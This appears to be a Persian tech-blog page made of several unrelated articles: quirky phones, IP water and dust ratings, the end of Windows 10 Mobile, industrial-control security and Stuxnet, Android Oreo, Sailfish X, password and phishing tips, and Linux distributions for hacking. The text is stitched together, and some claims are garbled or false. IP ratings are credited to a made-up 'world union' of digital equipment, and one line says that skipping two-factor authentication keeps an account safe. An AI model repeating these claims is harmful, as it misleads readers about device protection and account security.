
گوشیهای هوشمند این روزها رفیق گرمابه و گلستان همهی ما شدهاند. زمانی که پرچمداران جدید معرفی میشوند، همه ما دوست داریم یکی از آنها را داشته باشیم. شاید بسیاری از ما به خاطر نیاوریم که چند سال پیش چگونه با گوشیهای غیر لمسی سر میکردیم، یا شاید صفحات کوچک 3 تا 4 اینچی امروز برای بسیاری از ما غریب باشد. اگر با قلم استایلوس سری نوت کار کرده باشید، احتمالا دیگر نمیتوانید گوشیهای بدون قلم را تحمل کنید و دوربینهای دوگانه احتمالا شما را به خود معتاد خواهند کرد. با این حال چه در گذشته و چه امروز گوشیهای عجیب و غریبی نیز تولید میشوند که احتمالا بسیاری از ما را متعجب میکنند. در این مطلب قصد داریم مروری داشته باشیم بر 10 گوشی عجیب و غریب تاریخ. با جیاسام همراه باشید.
به نظر میرسد کسی که در شرکت نوکیا وظیفهی تایید نهایی طراحی گوشیها را بر عهده داشته، هنگام تایید طراحی گوشی N-Gage توسط جادوگری جادو شده و از به زبان آوردن کلمه «نه» عاجز بوده است. طراح این گوشی متوجه نبوده که افراد دوست ندارند گوشیشان شبیه یک کنسول بازی دستی باشد و دست به طراحی این چنینی زده است.

به نظر میرسد سال 2003 سال شکوفایی خلاقیت طراحان نوکیا بوده است. این شرکت فنلاندی در این سال علاوه بر N-Gage گوشی مربعی نوکیا 7600 را نیز روانه بازار کرد که از نظر شکل و شمایل بیشتر شبیه دماسنجهای دیجیتال دهه 80 میلادی بود! انگار طراح میخواسته محصولی طراحی کند که وقتی در جیبتان میگذارید هیچ کس به ذهنش خطور هم نکند که در جیبتان یک تلفن همراه قرار دارد!

یکی دیگر از عجیبترین طراحیهای گوشیهای موبایل که چندان هم قدیمی نیست، متعلق به شرکت بلک بری و گوشی Blackberry Passport است. این گوشی که در سال 2014 عرضه شد صفحه نمایش 4.5 اینچی مربعی شکل و صفحه کلید حساس به فشار داشت که شکل و شمایلی عجیب به آن بخشیده بود. تصویری که در زیر مشاهده میکنید از تبلیغات شرکت بلک بری برای این گوشی بود که عنوان میکرد با بلک بری پاسپورت زاویه دید گستردهتری در تلفن همراه خود خواهید داشت، هر چند به این نکته توجه نشده بود که شاید در دست گرفتن این گوشی چندان راحت نباشد. ضمن اینکه بعید است به راحتی از جیب در بیاید!

احتمالا آخرین گوشی مربعی که در تاریخ صنعت تلفن همراه ساخته شده، Motorola Flipout باشد. گوشی موبایلی که سال 2010 به بازار عرضه شد و البته به کاربر حس یک گوشی موبایل را القا نمیکرد. یک گوشی مربعی که با چرخاندنش میتوانستید به صفحه کلید فیزیکیاش دسترسی پیدا کنید. گرچه شاید در ابتدا این ایده جالب به نظر برسد، اما احتمالا بعد از چند روز کار کردن با این گوشی با تمام وجود آرزو میکردید که ای کاش گوشی دیگری خریده بودید.

بیشک گوشیهای کشویی و تاشو در تاریخ گوشیهای موبایل جایگاه قابل توجهی دارند، اما در پارهای از مواقع طراحان روی به طراحیهای عجیب و غریبی آوردهاند که به دل هیچ کس نمینشیند. یکی از این طراحیها به گوشی Sidekick تعلق دارد. در این گوشی بر خلاف سایر گوشیها با زدن دکمهای صفحه نمایش مسیری نیمدایره را طی کرده و به بالای صفحه کلید منتقل میشد.

شاید برایتان عجیب باشد که یک رستوران زنجیرهای دست به تولید یک گوشی هوشمند بزند، اما این اتفاق رخ داده و مدت زیادی هم از آن نگذشته است! KFC رستوران زنجیرهای آمریکایی 30 سال پیش اولین شعبه خود را در چین افتتاح کرد و از آن زمان در این کشور آنقدر محبوبیت یافت که تبدیل به محبوبترین رستوران زنجیرهای خارجی در چین شد. امسال و در جشن سی سالگی ورود KFC به چین این شرکت با همکاری هوآوی یک گوشی هوشمند ویژه به رنگ قرمز و با ویژگیهای نرمافزاری مخصوص و با تصویری از کلنل ساندرز در قاب پشتی، وارد بازار چین کرد. البته این گوشی در تعداد محدود 5000 دستگاه به بازار عرضه شد.

افراد زیادی در سطح جهان هستند که علاقهای به خوردن گوشت ندارند و حتی لباسهای چرم نمیپوشند، زیرا معتقدند در تولید این محصولات به حیوانات ظلم میشود. این افراد احتمالا از محصول 8000 دلاری شرکت Vertu متنفر خواهند شد. Signature Touch محصولی است که با قاب چرم به فروش میرسد که البته قابهای چرم این محصول تنوع فراوانی دارد، از قاب چرم خالص گوساله گرفته تا چرم تمساح!

اگر قیمت 8 هزار دلاری گوشی ورتو هوش از سرتان برده، بهتر است کنترلتان را حفظ کنید، چون گوشی بعدی دو برابر گوشیهای چرمی ورتو قیمت دارد! گوشی Solarin که محصولی از شرکت Sirin Labs است و مانور فوقالعادهای روی جنبهی امنیتی آن شده، قیمت احمقانهای دارد: 16 هزار دلار!

گوشی عجیب و غریب دیگری که اکنون با قیمتی حدود 25 دلار میتوان آن را از فروشگاه آمازون سفارش داد، گوشی بلوتوثی است. این گوشی مانند یک هدست بلوتوث طراحی شده که میتوان در آن یک سیمکارت قرار داد و با صفحهکلید روی آن شمارهگیری کرد. فقط باید توجه کنید که وقتی این گوشی را به گوش خود وصل میکنید قیافهی احمقانهای پیدا میکنید؛ شبیه لباسی که هنوز تگ قیمتش کنده نشده است.

اما آخرین گوشی عجیب این لیست محصولی از شرکت معتبر دوربینسازی RED است. این گوشی که تنها چند ماه از معرفی آن میگذرد قیمت عجیب 1200 دلاری دارد که باعث میشود قیمت آیفون 10 در مقابل آن پیش پا افتاده به نظر برسد. معلوم نیست شرکت RED با معرفی این گوشی چه طیفی از جامعه خریداران را هدف گرفته است. ضمن اینکه به جز صفحه نمایش 5.7 اینچی و ماژولار بودن، اطلاعات دیگری از آن منتشر نشده است. این گوشی به گفته شرکت RED سال آینده به بازار عرضه میشود.

گوشیهای هوشمند در کنار قیمتی که دارند، اطلاعات کاربران را نیز با خود حمل میکنند، این امر باعث شده است تا نگهداری از آنها اهمیت بیشتری پیدا کند، از طرف دیگر تمامی تولید کنندههای گوشیهای هوشمند نیز برای محصولات خود استانداردهای مقاومتی را اعمال میکنند که به این استانداردها به اختصار IP میگوییم، این استانداردها به لحاظ مقاومت گوشی یا تجهیزات الکترونیک با IPهای متفاوت شناخته میشوند. به همین منظور در این متن نگاهی به استانداردهای مقاومتی گوشیهای همراه هوشمند خواهیم داشت.
عبارت IP که در استانداردهای تجهیزات الکترونیک به کار میرود به معنای میزان مقاومت این تجهیزات است. استانداردهای مقاومتی بی دلیل به تجهیزات الکترونیک داده نمیشود و برای دریافت استاندارد، این محصولات باید از آزمایشهای سخت مقاومتی سربلند بیرون آیند.
از آنجایی که میزان مقاومت تجهیزات الکترونیک با یکدیگر متفاوت است،استاندارد IP اختصاص داده شده نیز متفاوت خواهد بود، این تفاوت را با شمارههایی در کنار عبارت IP میتوان تشخیص داد.

در کنار عبارت IP شاهد دو عدد هستیم. عدد اول از سمت چپ بیانگر میزان مقاومت بدنه دستگاه الکترونیک است و عدد دوم به معنای میزان مقاومت دستگاه الکترونیک در برابر آب میباشد. ناگفته پیداست که هر اندازه این اعداد بزرگتر باشند، میزان مقاومت دستگاه الکترونیک نیز بیشتر خواهد بود.
لازم به ذکر است که منظور از مقاومت در اینجا تنها مقاومت در برابر آب نیست و پارامترهای دیگری نظیر توان تحمل فشار آب و سایر فاکتورهای مقاومتی نیز در اختصاص این استاندارد تاثیر دارد. از طرف دیگر این نکته را نیز در نظر داشته باشید که این استاندارد توسط اتحادیه جهانی تجهیزات دیجیتال به دستگاههای الکترونیک اعطا میشود و شرکتها نمیتوانند برای محصولات خود استاندارد صادر کنند. با این حساب بد نیست نگاهی به مقدار اولین عدد حاضر در استاندارد مقاومت IP در تجهیزات الکترونیک و گوشیهای هوشمند داشته باشیم:
در این جا ذکر این نکته نیز لازم است که میزان مقاومت گوشی در زیر آب، رابطه مستقیمی با فشار آب وارده بر گوشی دارد. برای نمونه تفاوت زیادی میان ریختن آب بسیار زیاد و با فشار بر روی گوشی با افتادن گوشی در جوی آب وجود دارد.
به این نکته هم توجه کنید که حتی اگر گوشی دارای بالاترین استاندارد در برابر گرد و خاک هم باشد باز هم به این معنا نیست که همان گوشی باید مقاومت خوبی هم در برابر آب داشته باشد.
اکنون که با استانداردهای مقاومتی موجود در گوشیهای هوشمند آشنا شدید، بد نیست نگاهی به فهرست گوشیهای هوشمند دارای این استانداردها هم داشته باشیم. در این زمینه برای نمونه میتوان به گلکسی S5 سامسونگ اشاره کرد که استاندارد IP67 را داراست، از طرف دیگر اکسپریا زد ۲ سونی هم افتخار داشتن استاندارد IP58 را یدک میکشد. همانگونه که اشاره شد استانداردهای حاضر در این دو گوشی تفاوتهای زیادی با هم دارند، گلکسی S5 کاملا در برابر گرد و خاک مقاوم است اما اکسپریا زد ۲ را با اطمینان خاطر میتوان برای مدت طولانی در زیر آب نگه داشت.
اینجاست که در حین خرید پیشنهاد میشود حتما به استاندارد به کار رفته برای مقاومت گوشی توجه کنید. گوشیهای زیادی در بازار یافت نمیشود که در برابر گرد و غبار و نفوذ آب، کاملا مقاوم باشند و در بین شرکتهای تولید کننده گوشیهای همراه هوشمند، تنها سونی است که تمایل زیادی به رعایت استانداردهای مقاومتی در سطح بالا در گوشیهای هوشمند تراز اول خود دارد.
از طرف دیگر سامسونگ گوشیهای تراز اولی در بازار دارد که از هیچ کدام از این استانداردها بهره نمیگیرند، گلکسی نوت ۴ و گلکسی S6 را میتوان در این دسته قرار داد.
به هر ترتیب اگر قصد خرید گوشی هوشمندی را دارید و مقاومت این گوشی در برابر آب و گرد و خاک برای شما مهم است، برای راحتی شما در پایین لیستی از گوشیهای هوشمند اخیر دارای استانداردهای مقاومتی را گرد آوردهایم:

جو بلفیوری، نایب رئیس مایکروسافت، در یک سری توییت افشا کرد که غول نرمافزاری دنیا دیگر قصد توسعهی قابلیتها یا سختافزارهای جدید برای ویندوز 10 موبایل را ندارد. در حالی که طرفداران ویندوز فون امیدوار بودند مایکروسافت سیستمعامل موبایلیاش را با ویژگیهای جدید بهروز کند، اکنون دیگر کاملا مشخص شده که این شرکت ویندوز موبایل را در وضعیت سرویسدهیِ صرف قرار داده و تنها به رفع باگها پرداخته و برای کاربران فعلی بهروزرسانیهای امنیتی منتشر میکند.
بلفیوری در این باره میگوید:
البته که ما به پشتیبانی از این پلتفرم ادامه خواهیم داد... باگها برطرف و بهروزرسانیهای امنیتی منتشر میشوند، اما تمرکز ما روی ایجاد ویژگیهای جدید و ساخت سختافزارهای نو برای این پلتفرم نیست.
اکنون که مایکروسافت در حال به پایان رساندن مراحل آمادهسازی بهروزرسانی پاییزه ویندوز 10 با نام Creators Update است، کاملا واضح است که این شرکت در این حین هیچ کار خاصی برای ویندوز 10 موبایل نکرده است. در واقع ویندوز 10 موبایل در نسخهی Feature2 رها شده و این موضوع باعث ناامیدی طرفدران شده است.
نزدیک به بیش از یک سال است که ویندوز فون عملا مرده به حساب میآید، اما مایکروسافت در این مدت هرگز به صورت رسمی زیر بار قبول این موضوع نرفته بود. کسب و کار ناموفق مایکروسافت در بخش موبایل، سال گذشته باعث شد هزاران کارمند این شرکت تعدیل شوند. در کنفرانس اخیر مایکروسافت، ساتیا نادلا مدیرعامل این شرکت عنوان کرد که تمرکز شرکت متبوعش از موبایل و فضای ابری بر فضای ابری هوشمند انتقال پیدا کرده است. تمرکز در این حوزه بدان معنیست که مایکروسافت در حال کار بر روی تکنولوژیهای چند دستگاهی و مبتنی بر فضای ابری است که شاید فقط محدود به ویندوز نباشد.

بلفیوری همانند بیل گیتس اعتراف کرده که از یک گوشی اندرویدی استفاده میکند و عنوان کرده که مایکروسافت از آن دسته کاربران ویندوز 10 که میخواهند از اندروید یا iOS بر روی گوشیشان استفاده کنند، پشتیبانی میکند. یکی از دلایلی که مایکروسافت قید ویندوز فون را زده آن است که در طول عمر ویندوز فون، این سیستمعامل هرگز از سوی توسعهدهندگان نرمافزار جدی گرفته نشد. مایکروسافت با اپ استور ویندوز فونش مشکلات فراوانی داشت و از متقاعد کردن توسعهدهندگان برای انتشار نرمافزارشان در پلتفرم ویندوز موبایل عاجز بود. بلیفوری در این زمینه توضیح میدهد:
ما بسیار تلاش کردیم که توسعهدهندگان را تشویق کنیم. به آنها پول پرداخت کردیم، برایشان برنامه نوشتیم... اما تعداد کاربران بسیار کمتر از آن چیزی بود که بیشتر شرکتها تمایل به سرمایهگذاری داشته باشند...
حال مشخص است که مایکروسافت این واقعیت که مردم نیازی به ویندوز بر روی گوشیهای موبایلشان ندارند را پذیرفته است. برنامهنویسان در چند سال اخیر بر روی اپلیکیشنهای اندرویدی و آیاواسی تمرکز کردهاند. مایکروسافت نیز اخیرا اعلام کرده که مرورگر خود، مایکروسافت اج، را برای آیاواس و اندروید منتشر میکند و به نظر میرسد این شرکت در حال حاضر بیشتر بر روی این موضوع کار میکند که نرمافزارهای دسکتاپ بیشتری را برای موبایل منتشر کند تا کاربران بتوانند راحتتر بین موبایل و رایانهشان ارتباط برقرار کنند.
مایکروسافت حتی اخیرا یک لانچر اندرویدی منتشر کرده که ویژگیهای منحصر به فردی به خصوص در زمینه ارتباط با رایانه دارد. به همین ترتیب انتظار داریم در آینده شاهد انتشار محصولات نرمافزاری بیشتری از این قبیل از طرف مایکروسافت باشیم. در حال حاضر بعید به نظر میرسد که سرفیس بوک، گوشی موبایلی که چند سال اخیر شایعات بسیاری پیرامونش وجود داشته، در آینده معرفی شود و نباید انتظار رونمایی سختافزارهای سازگار با ویندوز 10 موبایل را داشته باشیم. مایکروسافت از ویندوز موبایل دل کنده و به سرمایهگذاری روی iOS و اندروید روی آورده و شاید بهتر باشد وفاداران فعلی ویندوز موبایل نیز کم کم به فکر به فراموشی سپردن این سیستمعامل بیفتند.

تمام آمارهای مستند نشان می دهد که تهدیدات امنیت سایبری شامل ویروس ها و بدافزارها در صنعت بویژه در سیستم های کنترل صنعتی رو به افزایش است در حالی که تا پیش از این به نظر می رسید تهدیدات سایبری محدود به نفوذ به اطلاعات مالی و اداری سازمانها باشد.
تعداد آسیب پذیری های شناسایی شده در صنایع و سیستم های کنترل صنعتی و PLCها در سال های اخیر افزایش چشمگیری داشته است:
تعداد آسیب پذیری های صنعتی گزارش شده به ICS-CERT

تعداد آسیب پذیری های گزارش شده به ICS-CERT در صنایع مختلف در سال های 2011 تا 2015
امنیت سایبری شبکههای صنعتی و سیستم های کنترل صنعتی چالشی است که صنایع مختلف و کارخانه ها با آن مواجهند.
امروره بدافزارها آنقدر قدرت یافته اند که از نقاط آسیب پذیر سیستم وارد سیستم کنترل صنعتی شوند، باعث اختلال در فرایند کنترل شده، جاسوسی کنند، خط تولید را مختل کنند و حتی باعث انفجار در صنایع مختلف شوند.
ایزوله بودن شبکه صنعتی از اداری برای استقرار امنیت کافی نیست؟
تجربه ثابت کرده است جدا بودن شبکه صنعتی از شبکه اداری نمی تواند تضمینی برای امنیت آن باشد. ویروس Stuxnet که در سال 88 به سیستم کنترل صنایع ایران از جمله تاسیسات صنعتی نفوذ کرد توانست به تجهیزات کنترل و PLCها نفوذ کند. این ویروس به شبکه های صنعتی بسیاری از صنایع نفوذ کرد.

نتیجه: شبکه های صنعتی ایزوله هم شبکه های لزوماً امنی نیستند و نیاز به ایمن سازی و تست و بازرسی از نظر امنیتی دارند.
نکته جالب تر اینجاست که بر اساس آمار، هنوز هم بیش از 70 درصد شبکه های صنعتی هنوز در برابر ویروس Stuxnet آسیب پذیر هستند!
ویروس Stuxnet می تواند بدون اطلاع اپراتور با ورود به اتاق کنترل و نفوذ به PLC باعث تغییر ضرایب PID Controller شده و منجر به انفجار شود!
از اینها گذشته ویروس Stuxnet یک ویروس تمام شده و به تاریخ پیوسته نیست! شناسایی نسل های جدیدی از Stuxnet برای حمله به سیستمهای کنترل صنعتی گزارش شده است. بدافزار اسرارآمیزی که به تازگی شناسایی شده، می تواند سیستم های کنترل صنعتی و SCADA را هدف قرار دهد.
امنیت در اتوماسیون صنعتی:
امنیت در سیستمهای کنترل صنعتی نه تنها در زمان طراحی و پیادهسازی، بلکه در زمان پشتیبانی و نگهداری سامانه نیز باید ادامه یابد. بهطور معمول شرکتهای سرویسدهنده در این حوزه، پشتیبانی از سامانه نصب شده را تنها محدود به رفع خرابی و یا اشکالات سیستم میدانند در حالی که بازرسی ها و تست های دوره ای امنیتی مهمترین بخش پس از اتمام پیادهسازی و در زمان بهره برداری به حساب میآید.
بسیاری از تجهیزات نصب شده ممکن است دارای آسیبپذیریهایی باشند که مهاجمین میتوانند توسط آنها به شبکه کنترل صنعتی نفوذ کرده، اطلاعات را به سرقت برده و یا اختلال ایجاد کنند. آسیبپذیریها ممکن است در معماری، تجهیزات، پیکربندی و یا موارد دیگر از اجزای سیستم کنترل صنعتی باشد.
امروزه یک ویروس و یا بدافزار این قابلیت را دارد که در دل صنایع و سیستم های کنترل صنعتی نفوذ کند و مثل یک بمب ساعتی باعث انفجار در صنایع مختلف شود و یک کشور را فلج کند!
بر اساس آمار منتشر شده توسط شرکت کسپرسکی، ایران در صدر حملات سایبری به سیستم های کنترل صنعتی قرار دارد:



اندروید ۸.۰، توجه ویژهای به مصرف باتری دستگاه دارد. یکی از امکانات جدید اندروید اوریو، «محدودیت فعالیت پسزمینه»(Background Execution Limit) نام دارد. با فعال کردن این قابلیت، سیستمعامل محدودیتهای جدیدی برای فعالیت پسزمینهی اپلیکیشنها اعمال میکند. بهصورت پیشفرض، این قانون برای اپلیکیشنهایی که برای اندروید ۸.۰ طراحی شده باشد، فعال است؛ ولی میتوانید در صورت نیاز، آن را برای اپلیکیشنهای قدیمیتر هم فعال کنید.
برای فعال کردن این قابلیت، کافی است که از تنظیمات دستگاه، وارد فهرست اپلیکیشنها شوید و در صفحهی اپلیکیشن مورد نظر، گزینهی Battery usage را انتخاب کنید؛ سپس گزینهی «فعالیت پسزمینه» (Background activity) را روشن کنید. لازم به ذکر است که این قابلیت، برخلاف نامش، فعالیت پسزمینهی اپلیکیشن را بهطور کامل متوقف نمیکند؛ بلکه فقط دسترسی آن را به منابع دستگاه محدود میسازد.

همانطور که در بالا گفتیم، این قابلیت بهطور پیشفرض برای تمام اپلیکیشنهایی که برای اندروید اوریو طراحی شده باشند، فعال است و نمیتوان آن را خاموش کرد. در نظر داشته باشید که اگر این قابلیت را برای اپلیکیشنهای قدیمی فعال کنید، ممکن است قسمتهایی از آنها مثل اعلانها، از کار بیفتد؛ بنابراین تنها در شرایطی که نیاز به شارژدهی بیشتر داشته باشید، از آن استفاده کنید.
سیستمعامل Sailfish در صنعت گوشیهای هوشمند به موفقیت چندانی دست نیافت. پس از چند همکاری ناموفق با اینتکس، فیرفون و تیآرآی، شرکت فنلاندی توسعهدهندهی این سیستمعامل، اکنون راهکاری متفاوت در پیش گرفته است.
ظاهرا سونی به جولا، شرکت توسعهدهندهی سیستمعامل Sailfish، اجازه داده است که این پلتفرم را برای گوشیهای هوشمند اکسپریا ایکس بهینهسازی کند. روز گذشته جولا اعلام کرد که نسخهی جدید سیستمعامل خود موسوم به Sailfish X را برای اکسپریا ایکس آماده کرده است و این سیستمعامل بهزودی برای خریداری در دسترس خواهد بود.
جولا قصد فروش سیستمعامل Sailfish X را به آن دسته از کاربرانی دارد که میخواهند این سیستمعامل را روی اکسپریا ایکس نصب کنند. جولا، فایل ایمیج مورد نیاز برای نصب سیلفیش ایکس (شامل VAT) را ۴۹.۹۰ یورو قیمتگذاری کرده است و عرضهی آن را از تاریخ ۱۹ مهر آغاز خواهد کرد.

کایل لیدی محقق و مهندس توسعه در Duo Security در این ارتباط گفته است: «اگر شما یک هدف باشید که البته صادقانه بگویم، شرکتها هدف اصلی هستند، با اتکا به یکسری اقدامات زیربنایی هم به خود و هم به شرکت مطبوعتان در این زمینه کمکهای فراوانی خواهید کرد.» Tech Insider به تازگی گفتگویی با لیدی در این ارتباط انجام داده است. گفتگویی که دو محور اصلی در آن مورد توجه قرار گرفتهاند. هکرها چگونه به سیستمها نفوذ میکنند و چگونه میتوان با رعایت چند توصیه ساده این مدل حملات را متوقف کرد. در ادامه توصیههای ارائه شده از سوی این کارشناس امنیتی را خواهیم خواند.
گذرواژههای ۱۴ کارکتری
گذرواژهای مورد استفاده توسط کاربران حداقل باید از ۱۴ کاراکتر تشکیل شده باشد. گذرواژههایی که در لغتنامهها نتوانید آنها را پیدا کنید. اگر نگاهی به ۲۵ مورد از بدترین گذرواژههای سال ۲۰۱۵ داشته باشیم، به کلماتی همچون ۱۲۳۴۵۶، football و Password برخورد خواهیم کرد. گذرواژههایی که به آسانی توسط یک هکر ممکن است حدس زده شوند. ما در اینجا درباره یک هکر که سعی میکند، گذرواژههای مختلفی را مورد آزمایش قرار دهد، صحبت نمیکنیم، بلکه صحبت از نرمافزارهایی میکنیم که این توانایی را دارند تا در یک دقیقه صدها یا هزاران گذرواژه را حدس بزنند. در نتیجه بهتر است از گذرواژههایی استفاده کنید که بیش از اندازه عجیب باشند. لیدی در این ارتباط گفته است: «اگر من بتوانم گذرواژه شما را در یک لغتنامه شناسایی کنم، در نتیجه یک هکر نیز توانایی انجام چنین کاری را خواهد داشت.» لیدی توصیه میکند از گذرواژههایی استفاده کنید که حداقل طول آنها ۱۴ کاراکتر باشد. (خودش از گذرواژههایی با طول ۲۴ کاراکتر استفاده میکند.) گذرواژههایی که از ترکیب حروف بزرگ و کوچک و سمبلها ساخته شده است. یک گذرواژه پیچیده چیزی شبیه به Syd#2n3l_!4pss است؛ ترکیبی که معنای واقعی نداده و سمبلهای مورد استفاده در آن یک هکر را گیج میکنند. در نتیجه به عنوان یک گذرواژه ایدهآل به شمار میروند. از طرفی به کارگیری یک جمله شبیه به “this password security thing words” یک گذرواژه گمراه کننده برای یک هکر به شمار میرود. لیدی میگوید: «حدس زدن این چنین گذرواژههایی برای یک هکر واقعا مشکل خواهد بود. شخصی که در نظر داشته باشد چنین گذرواژههایی را بشکند باید زمان و منابع مختلف زیادی را بارها و بارها مورد آزمایش قرار داده تا بتواند فرضیه خود را آزمایش کند.» اما در طرف مقابل این چنین گذرواژههایی برای کاربران مشکلساز هستند، به دلیل اینکه به خاطرسپاری یک گذرواژه طولانی از کاراکترهای عجیب و غریب کار مشکلی خواهد بود. به کارگیری یک مدیر گذرواژه، شما را از حفظ کردن این چنین گذرواژههایی بی نیاز میکند. یک مدیر گذرواژه شبیه به LastPass یا ۱Password به شیوه کاملا ایمن همه گذرواژههایی که توسط سرویسهای مختلف از ایمیل گرفته تا حساب بانکی را در یک مکان ذخیره میکند. در نتیجه حفظ کردن گذرواژههای مختلف ضرورتی نخواهد داشت.

لیدی به شدت توصیه میکند از گذرواژههای متعددی برای حسابهای مختلف استفاده کنید. یک مدیر گذرواژه به شما این توانایی را میدهد تا به جای ساخت یک گذرواژه عجیب از سمبلهای مختلف از این نرمافزارها در زمینه تولید گذرواژههای قدرتمند استفاده کنید. برنامههای مدیریت گذرواژه این توانایی را دارند تا گذرواژهای عجیب و پیچیده را تولید کرده و به صورت رمزنگاری شده در یک فایل قرار دهند. در نتیجه دیگر نیازی ندارید تا آنها را در مکانی یادداشت کنید.
احرازهویت دو عاملی
فعالیت بدون احرازهویت دو عاملی باعث میشود، حتی اگر گذرواژه شما به سرقت رفت، همچنان حساب کاربری شما ایمن باشد. لیدی در این ارتباط گفته است: «اگر از مکانیزم احرازهویت دو عاملی استفاده کنید، حتی اگر از ضعیفترین گذرواژهها استفاده کنید دنیا به انتها نخواهد رسید.»

احرازهویت دو عاملی به آرامی به عنوان یک استاندارد امنیتی برای گذرواژهها پذیرفته خواهد شد. با احرازهویت دو عاملی یک کاربر گذرواژه خود را وارد کرده و در مرحله دوم کدی را وارد میکند که آنرا از طریق یک پیام متنی دریافت کرده است. در بیشتر سناریوها، زمانیکه هکرها یک گذرواژه را میشکنند و به سد دریافت کد امنیتی برخورد میکنند از ادامه کار منصرف میشوند، به دلیل اینکه در این مرحله آنها باید تلفن همراه شما را برای ادامه کار خود سرقت کنند. این ویژگی در حال تبدیل شدن به یک گزینه استاندارد است. اما بسیاری از مردم این ویژگی را فعال نمیکنند. لیدی در این ارتباط گفته است: «بسیاری از مردم در این مرحله سهلانگاری میکنند.» شما معمولا مکانیزم احراز هویت دو عاملی را در بخش تنظیمات حساب کاربری خود پیدا میکنید. این ویژگی اکنون در جیمیل، توییتر، فیسبوک، اسنپشات و دهها سرویس دیگر در دسترس کاربران قرار دارد. تنها باید اطمینان حاصل کنید که فعال است. این سرویسها در بیشتر موارد از شما سؤال میکنند که آیا این کد باید برای اسمارتفون ارسال شود یا حساب ایمیلی شما.
جلوگیری از فیشینگ
نزدیک به ۹۱ درصد حملات هکری بر پایه فیشینگ ایمیل انجام میشود. یک ترفند خاص و ظریف که برای هدف قرار دادن یک کاربر خاص طراحی میشوند. بهطوری که او را مجبور میسازند روی یک لینک کلیک کرده، در ادامه گذرواژه خود را وارد کرده یا یک بدافزار را دانلود کند. این نوع ایمیلها به گونهای طراحی میشوند که واقعی به نظر میرسند. در نتیجه قضاوت در مورد آنها در نگاه اول به سختی امکانپذیر است. یک کلاهبردار ممکن است ایمیلی برای شما ارسال کند مبنی بر این موضوع که حساب پیپال شما هک شده است و شما باید گذرواژه خود را بهروزرسانی کنید. اما زمانیکه روی لینک مربوطه کلیک میکنید، شما گذرواژه خود را به او تقدیم خواهید کرد. در حالی که مشاهده میکنید، هیچ چیز تغییر پیدا نکرده است. لیدی در این ارتباط گفته است: «برای آنکه اطمینان حاصل کنید که یک صفحه معتبر و قانونی شبیه به Paypal.com و نه به یک سایت جعلی با آدرس www.paypalsecurity.xyz وارد شدهاید باید به دقت به آدرس توجه کنید. اگر هرگونه شکی در این ارتباط پیدا کردید، ضروری است که موضوع را به دقت بررسی کنید.»
ضد مهندسی اجتماعی
همانند مشکل شماره سه، باید مراقب تماسهای مشکوک باشید. هکرها اغلب با استفاده از مهندسی اجتماعی سعی میکنند شما را متقاعد سازند که قصد کمک کردن به شما را دارند. بنابراین مهم است که یک شک و تردید نسبت به تماسهایی داشته باشید که در آن ادعا میشود از نمایندگی خدمات مشتریان تماس گرفتهاند و از شما گذرواژهتان را درخواست میکنند. تقریبا هیچ شرکتی در تماس تلفنی از شما درخواست نمیکند گذرواژه خود را برای او بازگو کنید. اگر چنین تماسهایی داشتید، باید مشکوک شوید.»

هر چند در بسیاری از مطالب ارسال شده در وبلاگها و سایتهای مرتبط با هک اعلام میشود که ترجیح هکرها استفاده از سیستمعامل لینوکس برای مقاصد خرابکارانه آنها است، اما شواهد نشان میدهد که همیشه هم این گونه نیست. آمار نشان میدهد که در خیلی از حملات پر خطر انجام گرفته توسط هکرهای واقعی، آنها برای پنهان کردن کارهای خود از سیستمعامل ویندوز مایکروسافت استفاده میکنند. اگر چه اغلب هکرها چندان علاقهای به ویندوز ندارند، اما برای کار در محیطهایی که تنها در ویندوز اجرا میشوند (مثل فریم ورک داتنت، بدافزارهای تحت ویندوز و ویروسها) مجبور هستند که از این سیستمعامل نیز استفاده کنند. آنها از طریق فروشندگان آنلاین لپتاپهای ارزان قیمت و به اصطلاح یک بار مصرف را خریداری کرده و یک سیستم قابل بوت سبک را راه اندازی میکنند که نمیتوان در آینده رد آنها را گرفت. این نوع از لپتاپهای یک بار مصرف برای حافظه خود از USB یا کارت SD استفاده میکنند و با این کار به راحتی میتوانند کارهای خود را مخفی، نابود و یا حتی در مواقع لزوم آنها را ببلعند.
بعضی از آنها نیز یک گام فراتر رفته و برای سیستمعامل پارتیشنهای فقط خواندنی ایجاد میکنند و یک فضای ثانویه قابل نوشتن محدود را برای فضای ذخیرهسازی کاری خود در نظر میگیرند. هکرهای خیلی محتاط و شکاک نیز برای جلوگیری از امکان ردیابی کارهایشان آنها را روی حافظه رم ذخیره میکنند تا بلافاصله قابل نابود شدن باشند.
در حالی که بعضی از هکرهای کلاه سیاه سیستمعامل ویندوز را ترجیح میدهند، خیلی از آنها از توزیعهای لینوکس معرفی شده در ادامه استفاده میکنند:
Kali Linux یک توزیع لینوکس مبتنی بر دبیان است که برای پزشکی قانونی دیجیتال و آزمایش بررسی میزان نفوذپذیری از آن استفاده میشود. این سیستمعامل توسط شرکت Offensive Security تولید و نگهداری میشود. متی آهورانی و دوون کرنز در این شرکت به وسیله بازنویسی BackTrack این سیستمعامل را توسعه دادهاند. Kali Linux پرکاربردترین و پیشرفتهترین توزیع برای سنجش میزان نفوذپذیری است. Kali ابزار خود را بهروزرسانی کرده و برای انواع گوناگونی از پلتفرمها مثل VMware و ARM قابل استفاده است.
Parrot Security یک سیستمعامل مبتنی بر Debian GNU/Linux است که با ترکیب Frozenbox OS و Kali Linux بهترین امکان برای آزمایش امنیت و نفوذ را فراهم کرده است. این توزیع یک سیستمعامل برای آزمایش میزان نفوذپذیری و تعیین سطح امنیت است که توسط Frozenbox Dev Team توسعه داده شده است. این توزیع GNU/Linux بر پایه دبیان و با ترکیب Kali ساخته شده است.
Deft یک نسخه سفارشی شده از اوبونتو است که از مجموعهای از برنامههای مرتبط با جرایم کامپیوتری و اسناد ساخته شده توسط هزاران گروه و شرکت مستقل تشکیل شده است. هر کدام از این پروژهها تحت یک مجوز مخصوص به خود کار میکنند. این جوازهای صادر شده نشان دهنده آن است که کدام نرمافزار به طور پیش فرض از طریق دیسک نصب DEFT قابل نصب است.
Live Hacking OS نیز یک سیستمعامل مبتنی بر لینوکس با مجموعه بزرگی از ابزار هک کارآمد هم برای هک و هم آزمایش سطح نفوذپذیری سیستم است. این سیستمعامل از یک رابط کاربری گرافیکی GNOME استفاده میکند. یک نسخه دیگر از سیستمعامل وجود دارد که تنها از طریق خط فرمان قابل استفاده است و در نتیجه تجهیزات سختافزاری خیلی کمتری نیاز دارد.
